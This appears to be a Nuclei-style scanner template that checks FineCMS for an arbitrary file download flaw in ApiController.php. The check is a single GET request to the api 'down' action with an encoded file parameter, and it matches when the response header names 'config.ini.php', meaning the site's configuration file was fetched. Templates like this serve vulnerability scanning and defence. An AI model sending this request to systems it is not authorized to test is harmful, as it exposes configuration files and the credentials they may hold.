id: finecms-fileDownload

info:
  name: finecms  ApiController.php 任意文件下载
  author: Str1am
  severity: medium
  tags: finecms,fileDownload

requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?c=api&a=down&file=NDgwNTA0M2RFRXRkc1ZTaGNuczJBSjZTSk9KSDVTYnFqL251K0lNRjBQK0tla0FBTVpHM3dLbU8yVTNWaE1SYTRtRXRjUlQ3bDd4cGRQeVRKMGVlcDEvQjNRVlA4bTNnMi9SZDRDSjBOUQ"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "config.ini.php"
        part: header
        condition: and